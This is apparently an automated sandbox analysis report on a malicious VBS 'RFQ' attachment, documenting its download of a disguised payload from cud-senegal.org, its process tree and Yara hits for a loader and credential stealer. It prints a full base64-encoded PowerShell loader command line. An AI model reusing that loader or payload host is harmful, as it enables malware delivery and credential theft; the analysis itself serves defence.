cud-senegal.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	51.159.14.89	443	7728	C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 10:38:10 UTC	216	OUT	GET /post-postlogin/Agfdatq.mp4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: cud-senegal.org Connection: Keep-Alive
2025-01-15 10:38:10 UTC	208	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 10:38:10 GMT Content-Type: video/mp4 Content-Length: 1377288 Connection: close Last-Modified: Wed, 15 Jan 2025 09:54:03 GMT Accept-Ranges: bytes
2025-01-15 10:38:10 UTC	16176	IN	Data Raw: 5f 68 ca 51 88 0c 9a 90 e8 c1 4e 82 d6 3b f8 87 42 30 1e a6 31 ca df 49 02 de a8 2a ed bb 27 ac 24 a0 72 6e ea 08 12 c6 dd 23 c2 be 0a 9c 10 4a be ac 93 47 df 46 fd e6 41 d1 49 ed af 85 f2 92 f8 e9 16 7f 62 5a 05 87 6c a1 8c 02 5c 53 fa 5a a1 10 a8 c0 7d 9e cd 80 0a 97 d6 ee d9 96 f8 2a 01 e2 a6 77 03 f2 2c 46 34 75 88 56 da 8d a1 f7 33 4f ea e3 19 da 3a ee 79 37 a6 36 1e 89 4f ce 60 a4 d4 00 c7 c4 bb 50 8b ea 4d 0f 30 1b 15 a8 7b 60 8b 25 38 89 e4 df 75 96 0d 07 53 92 2d 34 21 72 89 2e ff 87 da 13 61 40 e6 ec 6c 44 db 3e d3 04 2f 20 67 2d f0 a0 ae e9 e3 c8 54 6c 36 83 80 12 5c 27 f9 9b f2 32 32 08 32 55 5b 30 0f 1e e0 ef a9 3c 40 2a 93 c0 86 54 a1 47 a1 6f b4 cc 0e 3a 70 59 76 d3 52 9c 6a b2 de 33 68 d1 4e ec cf c2 9e a3 10 01 be 37 23 a8 06 77 96 3e 13 Data Ascii: _hQN;B01I'$rn#JGFAIbZl\SZ}w,F4uV3O:y76O`PM0{`%8uS-4!r.a@lD>/ g-Tl6\'222U[0<@*TGo:pYvRj3hN7#w>
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 0e 7e cb 49 71 48 81 3b 0a 7b 07 30 b2 2c ea 01 0a d4 be 19 36 d1 2a 3a 51 7d 02 26 f3 49 e9 da 22 b5 0a 4c 94 59 23 e8 75 2b f1 7f 23 2f a2 21 b9 e0 03 1f 2a 0a be 87 f2 85 14 2f cb 96 c6 2e 23 ab ee 54 5b 20 85 86 a0 1a 46 1b 51 0a 6d 99 94 92 37 d7 6c e9 db da af 64 86 98 39 81 2f 6c 0f 0e 05 ef 50 fa b1 71 f2 18 d9 e5 0d ca a9 01 e6 0b 9c 23 8f 60 f3 08 f7 91 35 e7 ec 4a 62 c1 9e e0 f3 6c 58 04 69 92 25 99 0b 4a b5 e3 d3 1e 5d a6 06 79 ea e0 04 65 a0 62 7d ef 6d fb 4e b8 e3 14 42 1b 40 0c bf 54 51 9b c6 0b 75 b2 34 62 a6 0c 25 a7 15 3d 31 3b 8f f5 e4 32 90 32 ac 7b 97 be b6 45 29 86 5f eb c5 1b 06 5c 22 fa b7 47 2e 23 9a e1 9b ea 14 28 ad 30 05 bd 55 79 8f 84 a0 9b 14 7f de c7 0b dd 8e 90 ce 7a ed e4 e7 f9 35 7d 87 a5 f7 fd a5 75 25 99 d1 1b ca 64 38 Data Ascii: ~IqH;{0,6:Q}&I"LY#u+#/!/.#T[ FQm7ld9/lPq#`5JblXi%J]yeb}mNB@TQu4b%=1;22{E)_\"G.#(0Uyz5}u%d8
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 8d 17 a1 04 33 55 a0 00 e5 12 73 61 2d ab 65 be d0 f9 8e 3c f6 61 45 b8 9b fb ba 06 57 c8 8b 41 6b 46 7c 9c 67 70 d7 d2 9e 7e 10 8e 1c 07 82 f2 9f 93 34 bf 40 a6 4e af 8c 36 3f d8 89 0d 47 64 93 fe 98 7e 75 2f e5 72 2a 7b 8c 73 45 16 8b 86 ad 52 52 49 dc f5 c2 95 66 20 82 8d 11 d3 a9 f3 34 d7 b4 cc 3c cb fd 40 f7 8b e5 ec 1b ed df 8a e0 81 bf c0 e5 a7 97 9b 1d bf d7 9f c8 7d bd 0c 2f ca 43 c4 11 9a ea b4 e3 2c d5 b7 d9 40 7d 94 47 95 4c b8 f4 67 0a 7e ed f6 84 69 5e 7f 6c 79 b9 ef 78 b5 b3 d6 5b 9d 10 4a 81 b8 3d 03 9a 16 c1 e0 a3 96 eb 8b 20 39 0a f4 ec 54 91 ce e9 69 de 85 b5 97 2a 8e b1 64 34 45 de 0e f5 7f 6f e0 23 4f 4c 4f f1 3c 69 7f fd 01 b9 21 3c 53 66 8b 96 06 a1 64 35 43 18 0f a1 c1 62 12 d6 cb bd aa 02 61 c7 e4 7c ab 30 7b e9 fe b0 14 ad e8 9f Data Ascii: 3Usa-e<aEWAkF\|gp~4@N6?Gd~u/r{sERRIf 4<@}/C,@}GLg~i^lyx[J= 9Tid4Eo#OLO<i!<Sfd5Cba\|0{
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 8c 89 97 24 70 bf 2c dc 14 be a5 62 6a 1f 8a 9d 2c 3b 3f 8b 5a 1e 6a a0 e9 9e 35 d6 07 10 25 68 02 7e 21 4a 50 00 2d 9d 44 63 c0 0a 20 b5 0d 6f b7 1e fe ea eb 8d 29 db c8 d0 1f 6a 7e bb b2 19 26 31 80 e1 90 3b 44 a9 fb 3c 91 c7 cc 7b 79 b8 34 45 c8 41 18 65 17 4a 8f be 66 13 e8 69 d2 cb f1 a6 bc 50 84 f3 f7 81 44 bf bd 04 34 a0 7e f4 6f ff aa 85 0e e5 10 5b 3c 5e d1 cb ff c2 a9 e6 a9 fe 2a 1e cc 46 35 6d 3b 9d 79 4a 0b f4 1a 50 c4 04 43 0f c5 00 af c4 b9 7b 27 db e1 68 0c 85 28 e3 06 0c 8d 51 1a a5 0a 9c a6 c1 ac 96 bb 2c f0 3a ac c8 8d 4b 38 80 f3 58 2b 76 76 85 e8 35 4f 8d 88 67 d7 eb 1b 50 a5 5b 01 34 74 d0 a5 a8 43 4e 56 49 ef 24 24 a2 30 d9 46 17 be 66 7b ae 5f f4 0f 86 01 69 8e 0d 00 fc 48 31 50 ab b3 01 b5 3e e0 60 d2 d1 7e c4 65 ea c4 d1 01 44 0c Data Ascii: $p,bj,;?Zj5%h~!JP-Dc o)j~&1;D<{y4EAeJfiPD4~o[<^*F5m;yJPC{'h(Q,:K8X+vv5OgP[4tCNVI$$0Ff{_iH1P>`~eD
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 3f a0 45 23 85 2d 85 f2 48 c5 4c 7d 6a c5 f4 55 1a 0a d9 32 bb 80 b6 78 2a 62 07 2c f9 96 27 1c 89 61 65 81 3f 58 5e 5c be d6 f2 43 8f 4d 61 69 7d 74 5f 68 3f 02 0e 14 80 bd 70 ab 33 85 b8 d9 9d f1 25 c2 37 fd 4e c4 ac 8a 3b 69 3d d1 aa 73 ce 5c 85 d7 6a ee 69 41 6e 8c c7 0b b1 81 f3 cb 9c ef 38 34 f9 f6 7e 18 5f fa 8c a7 6e 96 18 04 44 30 88 33 30 ed ec 1c 19 2f 2c bf 9e 31 ab 30 7b 77 8b a5 54 50 f9 41 5c 84 78 31 b4 73 99 5e 8d aa 3b 40 76 6d b7 21 fb 3b ba aa 61 4b 90 5b b4 e7 50 c0 f6 ea 5c a0 b3 c1 2b 36 d6 21 dc 53 94 86 dc 08 e0 47 02 e8 8a 29 6f 08 f6 9a 86 1d 1f a3 b6 92 fc 9f 7d ee b0 3f df cc fe 30 15 9a 65 82 62 c8 51 b5 a3 ca e7 81 3f f5 52 08 de 7c 34 15 fb b8 e0 8b 43 7a ea 39 f0 a1 23 a7 16 58 c5 8a 82 b1 9c e2 a8 51 91 bb 39 c5 a7 11 58 Data Ascii: ?E#-HL}jU2x*b,'ae?X^\CMai}t_h?p3%7N;i=s\jiAn84~_nD030/,10{wTPA\x1s^;@vm!;aK[P\+6!SG)o}?0ebQ?R\|4Cz9#XQ9X
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: b1 cc df 80 26 61 dd 51 85 83 85 37 db 11 92 14 0c 99 c6 92 ef bd f3 a1 d9 f8 57 46 37 55 81 2f f6 11 2f 4c b4 0e b3 60 2b b3 c5 85 dc 02 19 6d df 83 81 09 35 e7 17 5d 3e 61 8a 56 64 94 01 e4 e8 fb 23 d7 68 bf f2 c4 b4 cb 50 1e 00 2c ea 2a 2c d4 b0 8f be 63 e9 5a 16 64 d0 dd 18 99 c6 c9 a3 e6 21 95 ab 0d b1 91 f6 b9 43 d3 80 30 a7 0a 3f 72 17 d8 e2 3e f8 50 ec 29 c8 13 ed 05 0b 97 25 98 b1 97 8e fb 2d 5d d8 51 67 23 6d 5d d3 64 d9 0d ed 1c 1c 79 4d f9 ef 32 91 41 90 2a 83 e7 e8 88 9e f4 a1 4e b7 dd bf c6 f8 8c 7e 87 37 22 72 76 3d b4 be 53 4c c2 22 dc 0e 95 22 c5 1a 74 03 ea 65 4a 79 2b 92 04 3a 08 d8 0c 45 10 67 76 48 96 94 7d f9 75 a1 fc 56 ba ea b5 9a f3 ad a0 7a e4 61 cd b7 0e 87 10 c3 51 53 93 1c cd 2d 53 05 c2 5f 27 29 b0 6a 4d ed a9 08 c3 e6 a3 5e Data Ascii: &aQ7WF7U//L`+m5]>aVd#hP,,cZd!C0?r>P)%-]Qg#m]dyM2AN~7"rv=SL""teJy+:EgvH}uVzaQS-S_')jM^
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: d7 77 1a f2 58 3b 29 b1 44 eb d8 5d c2 0b 1d 46 e0 fe 89 38 93 d7 33 30 2e 3a a0 fa 68 83 77 ca 2f 17 ac d4 60 90 4d 04 80 98 34 e6 0d 03 d1 be 6e 10 20 6d 0e d4 ea 5d 5f df f5 85 62 25 4d fa 42 c6 40 a3 2d 67 8c 1d 9c 29 30 ce a1 de e7 8c 56 7b da 2e bc 0a d8 50 42 31 33 91 6c d1 5e e0 04 66 88 ec 60 16 c1 4e b6 50 dc 17 23 19 fd ca 6a 00 da 81 b0 76 d4 b2 9c e2 2c 78 8a 76 c8 ef dd 68 64 11 d4 ca 4c f2 e6 7b 1a a8 18 20 43 6f 5b 52 22 e9 55 3b ab 1e 40 4a 1d 84 f6 09 97 61 d4 f8 62 15 e5 47 a9 e8 ba 99 ec c1 02 d0 b6 87 5c d2 02 7c f9 79 ac 11 88 d0 47 43 fe 8d e6 d8 8d 15 20 c4 4b 98 74 4f ec 4f be 2e 64 d4 15 75 9d f8 f7 b0 c9 bf 8d d9 04 36 34 c3 e6 b7 2d a3 50 7b 51 59 73 78 fe f1 e2 05 2c 58 15 9e d2 e8 36 c1 50 d1 b4 fc 2e db 18 bd 2e f6 1f ca ad Data Ascii: wX;)D]F830.:hw/`M4n m]_b%MB@-g)0V{.PB13l^f`NP#jv,xvhdL{ Co[R"U;@JabG\\|yGC KtOO.du64-P{QYsx,X6P..
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 55 ea 01 5d ff 71 7b 6d d0 ee c2 7d 89 c9 3a 4f ce c6 14 0c 08 a3 ae dd c6 9f f7 50 eb 88 bb eb f1 a3 0a 13 a5 c0 ca 5e b7 2f 8f 6d bd 33 d9 7c 0e 2f 85 c6 d5 a6 0e 19 95 98 95 af 31 98 fa 6a ff 93 d4 9e 85 3a af 15 e3 e4 ec 0a ea 89 62 7f 0a 80 78 6a 8e 5d 54 ad 6e 71 b9 bd 94 d2 4a 3d b1 1d 02 b9 89 5d 17 e7 eb de 8c 74 d3 f3 97 60 86 e4 4e b5 4f 47 64 df 38 f9 4a 82 0f 6f aa 45 58 ff 41 d0 a0 7d 9c 2a b3 5b 3a ad 63 34 9d ff 6a 7a ae 53 70 f8 5d 0f a9 67 cc bd 0a 14 42 66 7a 53 6b 57 35 9f 94 81 9e 03 d9 4c a9 f6 7e ff 33 bf 6e f4 44 06 1e 08 2c b6 15 5c 8d c9 93 df 72 e3 e1 29 aa 43 ac 80 8f 03 d1 ae ad 75 b4 6d 45 3f be 38 8b be 68 9e 84 4a 41 dc ed e2 b4 c2 bf a7 71 01 44 0f 9c 44 83 06 09 bc 06 73 c6 82 95 64 90 ae 3c 6e 59 f3 18 62 10 98 97 52 99 Data Ascii: U]q{m}:OP^/m3\|/1j:bxj]TnqJ=]t`NOGd8JoEXA}*[:c4jzSp]gBfzSkW5L~3nD,\r)CumE?8hJAqDDsd<nYbR
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 4b b1 8b f8 35 3a f7 c0 8f 45 b5 01 75 52 1b 2e e3 00 86 f1 be 32 d3 00 12 d0 55 fa 8f b4 7d a3 1c a0 67 9e 09 22 07 71 4c ce e4 85 89 cb 43 28 ad 9e 67 4b 6c 09 ce e3 c7 54 75 24 3e ff 4a 38 59 51 c1 d6 3a 93 61 5e e1 54 a9 1a 01 7b 7c d3 e5 e4 a3 2b f8 18 b5 46 1f 32 85 40 fe 9a e0 d8 51 68 cf ff 77 a9 0a 1d b6 a5 4e 1f d7 bf f6 c0 a9 c4 15 97 40 c9 77 45 30 1e 4d b8 07 54 cd be 4e 72 fd b8 af e1 0c c5 ed 9b 11 c4 18 82 1d 0f 96 89 cf 91 3e 3c 77 c2 ce 48 c8 2b 7b 9b b0 f0 05 0d fd 08 f7 04 47 83 66 b1 3d 1a 45 f1 f2 96 bd ac 31 a5 56 44 d0 78 bb 47 97 89 1c ed f7 e7 95 a9 9f 6c d3 51 0b 54 d0 ad a2 4d 24 a5 7e ad 93 fc 00 71 78 56 44 92 00 ea 3f 65 e6 19 30 1d 8e 40 a1 b5 b7 3d a4 de 82 91 c8 42 9f c2 64 8d 73 ef 98 cd 16 ce 55 e0 94 5a 8d 07 2c 03 9d Data Ascii: K5:EuR.2U}g"qLC(gKlTu$>J8YQ:a^T{\|+F2@QhwN@wE0MTNr><wH+{Gf=E1VDxGlQTM$~qxVD?e0@=BdsUZ,
2025-01-15 10:38:10 UTC	16384	IN	Data Raw: 75 1f 00 7d ea 3d a4 e0 cd 5c 28 48 8f f9 1f 70 67 33 58 b2 f6 aa 37 5c 10 91 5a 55 94 60 d1 0e 96 a8 de 26 06 11 12 e2 6c 10 f7 cb 45 84 d8 be 5a 53 86 a5 e8 b1 f2 99 80 c1 16 be 67 c2 91 08 b0 02 86 e1 32 5d 4d 5b 21 93 e1 94 02 fc ce e2 6a 4b 05 91 4b c8 3e a7 e2 49 ee e6 bb fc b6 7f a0 89 ca ce e9 c9 64 4c 11 81 a3 dd a6 d9 f2 8c 06 30 88 e0 52 a5 7e 14 f5 97 39 5a bc 46 8f cb 79 82 65 c8 04 0f 21 58 6c 96 42 4c 25 3c f9 8f 47 36 52 4f 2f 75 ce 74 d9 51 53 59 ab 62 82 6c 12 66 2a 0d da 12 8e 27 e4 db e9 ff 4e ce d9 47 2a 7b e1 f4 01 ac 1a 21 f0 11 b8 0b af 4e 49 66 fc ca 15 1f e4 ab 6b 5b ce 8f ff c6 fe 49 a5 0f d4 59 3d da 4b 91 4f 0b 7f 43 ed bc e5 df 6e ec c1 87 c8 5f 9e 8c b7 8c c8 aa 3d a4 4c 55 6c 62 74 31 19 f5 a4 01 a8 18 9d ca 36 44 16 15 63 Data Ascii: u}=\(Hpg3X7\ZU`&lEZSg2]M[!jKK>IdL0R~9ZFye!XlBL%<G6RO/utQSYblf'NG{!NIfk[IY=KOCn_=LUlbt16Dc

Target ID:	0
Start time:	05:38:03
Start date:	15/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs"
Imagebase:	0x7ff612a00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:38:04
Start date:	15/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y
Imagebase:	0x7ff7b67b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:38:04
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:38:06
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2045997781.0000000009B70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2024331201.00000000067F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:38:06
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:38:32
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x220000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2076310345.0000000004CB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	99.5%
Signature Coverage:	2.5%
Total number of Nodes:	564
Total number of Limit Nodes:	53

Executed Functions

Function 09940040 Relevance: 5.1, Strings: 3, Instructions: 1335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d_{, xrefs: 099402B6
2, xrefs: 0994101E
$^q, xrefs: 099406A2

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 2$d_{$$^q
API String ID: 0-735896107
Opcode ID: 2658ab4eb4d2fa5bcd90751b88a51f38101c07f7571b6ca7920e89c9ca089ff1
Instruction ID: e0043284486d23032765cde0b49bf855b1dbc78535711d76f060c55d5560a896
Opcode Fuzzy Hash: 2658ab4eb4d2fa5bcd90751b88a51f38101c07f7571b6ca7920e89c9ca089ff1
Instruction Fuzzy Hash: 8FE2E7B4E012288FDB65DF68D884B9ABBF6FB89304F1081E9D509A7354DB309E85CF51

Function 074A3598 Relevance: 3.1, Strings: 2, Instructions: 613
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 074A36B2
fcq, xrefs: 074A36C5

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: 330a4f9c5a5a1877db0b15d22709be7f7ec1766f51e0d97125ecfd8d6c0b0994
Instruction ID: f756874afc6bfd462cc02b8bdcca1ffb367d1a79f9b61833cedc3e86e6287562
Opcode Fuzzy Hash: 330a4f9c5a5a1877db0b15d22709be7f7ec1766f51e0d97125ecfd8d6c0b0994
Instruction Fuzzy Hash: 7D52E675E01229DFDB64DF68C890BD9B7B2FB99304F1481AAD909A7354DB30AE81CF50

Function 074A3588 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

h, xrefs: 074A36A6
fcq, xrefs: 074A36C5

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: 9bb3be93a068a327ea96199cc57a3cbdbb3057e66d7575002a722d5a60f35c10
Instruction ID: 8dcfe4cf2eb30e428e352a565f1371d66b8be309ebdae069752a5084236e89a3
Opcode Fuzzy Hash: 9bb3be93a068a327ea96199cc57a3cbdbb3057e66d7575002a722d5a60f35c10
Instruction Fuzzy Hash: 7E712975E012289FEB54DF69C840BDABBB2FF89304F14C2AAD509A7254DB306E85CF51

Function 0993DE38 Relevance: 1.9, Strings: 1, Instructions: 604COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993E148

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 5837b8eb81346d7d847721092a351bf4383bbaa6c725f6ed39c50a6b949ce6a1
Instruction ID: 79550d9cc678c4ac4d9225a324025389fc70235555b125741c75b63f196b1eb2
Opcode Fuzzy Hash: 5837b8eb81346d7d847721092a351bf4383bbaa6c725f6ed39c50a6b949ce6a1
Instruction Fuzzy Hash: 99328870A012568FCB15DFB9C49866EBBF2FF88300F64C569E85AD7391DB30A905CB81

Function 074AA858 Relevance: 1.6, APIs: 1, Instructions: 121nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 074AA8EE

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a771fce8dd695b3e531f657488fbc5dee83aa7b94c2154adaf9b7ba422c32fb3
Instruction ID: fddbbe4fa7b3d375098b758dd2afea531f2d7e6527608b5b27e2a00f82a5f08a
Opcode Fuzzy Hash: a771fce8dd695b3e531f657488fbc5dee83aa7b94c2154adaf9b7ba422c32fb3
Instruction Fuzzy Hash: AA41BDB8E012199FCB00DFA9D581AEEBBF1EB49310F24942AE915B7340C734A945CF94

Function 074AA860 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 074AA8EE

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

